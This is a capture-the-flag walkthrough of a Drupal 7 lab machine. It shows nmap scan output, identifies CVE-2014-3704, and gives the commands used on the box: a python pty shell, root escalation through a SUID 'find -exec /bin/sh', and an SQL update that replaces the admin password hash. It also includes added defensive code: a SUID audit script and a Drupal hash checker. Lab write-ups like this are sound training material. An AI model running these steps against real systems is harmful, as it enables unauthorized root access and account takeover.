Objective: the target machine holds 5 flag files; find all 5.
I. Information gathering
1. Identify the target host and its IP address
The target host's IP is 192.168.101.42.
2. Port scan
nmap -A -P0 -p- -sS --min-rate 10000 192.168.101.42
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-08 01:22 EDT
Nmap scan report for 192.168.101.42
Host is up (0.00046s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36890/tcp status
| 100024 1 40020/udp6 status
| 100024 1 44827/udp status
|_ 100024 1 51483/tcp6 status
36890/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:45:F7:D8 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms 192.168.101.42
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.05 seconds
Open ports: 22, 80, 111, 36890.
II. Vulnerability scan
Use nmap's vuln script category to scan for vulnerabilities.
nmap --script=vuln -p 80,22,111,36890 192.168.101.42
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-08 01:26 EDT
Nmap scan report for 192.168.101.42
Host is up (0.00043s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.101.42
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.101.42:80/
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://192.168.101.42:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://192.168.101.42:80/node?destination=node
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://192.168.101.42:80/user/register
| Form id: user-register-form
| Form action: /user/register
|
| Path: http://192.168.101.42:80/user/
| Form id: user-login
| Form action: /user/
|
| Path: http://192.168.101.42:80/user
| Form id: user-login
|_ Form action: /user
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /: Drupal version 7
| /README: Interesting, a readme.
| /README.txt: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /user/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704:
| VULNERABLE:
| Drupal - pre Auth SQL Injection Vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-3704
| The expandArguments function in the database abstraction API in
| Drupal core 7.x before 7.32 does not properly construct prepared
| statements, which allows remote attackers to conduct SQL injection
| attacks via an array containing crafted keys.
|
| Disclosure date: 2014-10-15
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
| http://www.securityfocus.com/bid/70595
| https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|_ https://www.drupal.org/SA-CORE-2014-005
111/tcp open rpcbind
36890/tcp open unknown
MAC Address: 00:0C:29:45:F7:D8 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 138.38 seconds
Vulnerability ID: CVE-2014-3704
In brief, this vulnerability can be exploited to obtain a webshell.
III. Exploitation (obtaining a webshell)
Search for this vulnerability in msf.
IV. Privilege escalation
1. Spawn an interactive shell with python
python -c "import pty;pty.spawn('/bin/bash')"
2. Look for files with the SUID bit set
find / -perm -u=s -type f 2>/dev/null
3. Escalate privileges through the SUID find binary (123 here is an existing file passed as the search path)
find 123 -exec '/bin/sh' \;
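As an added defensive counterpart to the SUID step (my own example, not part of the original write-up): a POSIX sh audit that compares the output of the find command above against an assumed baseline of SUID binaries and flags anything else, such as a SUID find. The baseline paths and the sample list are constructed assumptions, not data from the target.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit the SUID binaries on a
# host against an allowlist so an unexpected entry such as /usr/bin/find stands
# out. EXPECTED is an assumed baseline for a Debian 7 style system; adjust it
# for the host being audited.
EXPECTED="/bin/su /bin/mount /bin/umount /bin/ping /usr/bin/passwd /usr/bin/sudo
/usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgrp"

# is_expected PATH: succeed if PATH is in the baseline
is_expected() {
    for e in $EXPECTED; do
        [ "$e" = "$1" ] && return 0
    done
    return 1
}

# audit_suid: read one SUID path per line on stdin (the output of
# `find / -perm -u=s -type f`) and print each path not in the baseline
# together with the command that removes the bit. Succeeds only if nothing
# was flagged, so it can gate a hardening check.
audit_suid() {
    flagged=0
    while IFS= read -r p; do
        [ -n "$p" ] || continue
        if ! is_expected "$p"; then
            printf 'UNEXPECTED SUID: %s  (fix: chmod u-s %s)\n' "$p" "$p"
            flagged=$((flagged + 1))
        fi
    done
    [ "$flagged" -eq 0 ]
}

# Constructed sample standing in for a real find run on the target.
SAMPLE='/bin/su
/usr/bin/passwd
/usr/bin/find
/usr/bin/sudo'

# Run with --live to audit the local host instead of the constructed sample.
if [ "${1:-}" = "--live" ]; then
    find / -perm -u=s -type f 2>/dev/null | audit_suid || printf 'baseline deviation found\n'
else
    printf '%s\n' "$SAMPLE" | audit_suid || printf 'baseline deviation found\n'
fi
```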
V. Finding the flags
flag1 and flag2 have already been found; start with flag1.
Every good CMS needs a config file - and so do you.
A search shows that Drupal 7's configuration file is settings.php; locate it.
Inspecting the configuration file reveals flag2.
Log in to the database.
The username and password have been found, but the password is stored as a hash rather than in clear text, which is hard to crack.
Approach: since we can now log in to the database, we can replace the password instead: find the hashing routine the target uses, hash a password of our choosing with it, and overwrite the password in the users table.
Drupal generates password hashes with password-hash.sh by default.
Locate that script.
Use the script to generate a password hash.
Replace the admin password:
update drupaldb.users set pass="$S$DBi2slgpGSlKKNNj9vLcOmtPqnVzZQCaAl7NUGPfjrLTBsf.hfOn" where name="admin";
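To make the hash format this step relies on concrete, here is an added example (my own code, neither from the write-up nor from Drupal's own files) re-implementing the Drupal 7 `$S$` scheme of includes/password.inc in Python, so a responder can check whether a stored users.pass value still matches the legitimately set password and read its cost parameter. The sample passwords are constructed; the only real hash referenced is the one shown in the UPDATE above.

```python
# Added example (not from the original write-up): pure-Python re-implementation
# of the Drupal 7 "$S$" password hash for checking stored users.pass values.
import hashlib
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55                              # DRUPAL_HASH_LENGTH: stored value is truncated to this
MIN_LOG2, MAX_LOG2, DEFAULT_LOG2 = 7, 30, 15  # DRUPAL_MIN/MAX_HASH_COUNT and DRUPAL_HASH_COUNT

def _b64(data):
    """phpass-style base64 used by Drupal's _password_base64_encode()."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def crypt_sha512(password, setting):
    """_password_crypt('sha512'): setting is '$S$' + cost char + 8-char salt; None if malformed."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    log2 = ITOA64.find(setting[3])           # cost parameter, count_log2
    if not MIN_LOG2 <= log2 <= MAX_LOG2:     # reject out-of-range cost
        return None
    salt, pw = setting[4:12].encode(), password.encode()
    h = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << log2):               # 2**log2 further rounds (32768 by default)
        h = hashlib.sha512(h + pw).digest()
    return (setting + _b64(h))[:HASH_LENGTH]

def hash_password(password, log2=DEFAULT_LOG2):
    """user_hash_password(): fresh 6-byte salt, which is what scripts/password-hash.sh calls."""
    return crypt_sha512(password, "$S$" + ITOA64[log2] + _b64(os.urandom(6)))

def check_password(password, stored):
    # user_check_password() for $S$ hashes: recompute with the stored setting and compare
    return stored.startswith("$S$") and crypt_sha512(password, stored) == stored
```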
flag3 was found under Content.
The gist of it is to look at the passwd file to find flag4, but since privilege escalation with the find command earlier already turned up flag4, it can simply be read directly.
Privileges have already been escalated, so just look in the root directory.
VI. Summary
1. Drupal 7's configuration file is settings.php.
2. Drupal generates password hashes with password-hash.sh by default.